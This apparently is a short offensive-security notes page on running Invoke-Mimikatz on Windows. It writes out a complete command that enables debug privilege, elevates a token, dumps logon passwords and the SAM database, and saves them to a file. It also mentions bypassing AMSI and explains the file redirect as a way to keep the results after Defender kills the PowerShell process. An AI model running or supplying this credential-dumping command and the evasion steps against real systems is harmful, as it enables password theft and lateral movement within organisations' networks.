permalink: spells/invoke-mimikatz
tags:
- Application/PowerShell/Invoke-Mimikatz
- AttackCycle/PrivEsc
- AttackCycle/LateralMovement
- Protocol/Kerberos
- OS/Windows/ActiveDirectory
- AttackCycle/Reconnaissance
- AttackCycle/PrivEsc/PassTheHash
- AttackCycle/LateralMovement/PassTheHashMimikatz binaries are generally detected by AV on download these days, but fortunately there's a PowerShell re-implementation available from the Empire Project that can be run after bypassing AMSI.
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"' > C:\mkat.txt
Note that Microsoft Defender will still detect the execution of Invoke-Mimikatz and kill the hosting PowerShell process. This is why we need to redirect the output to a file.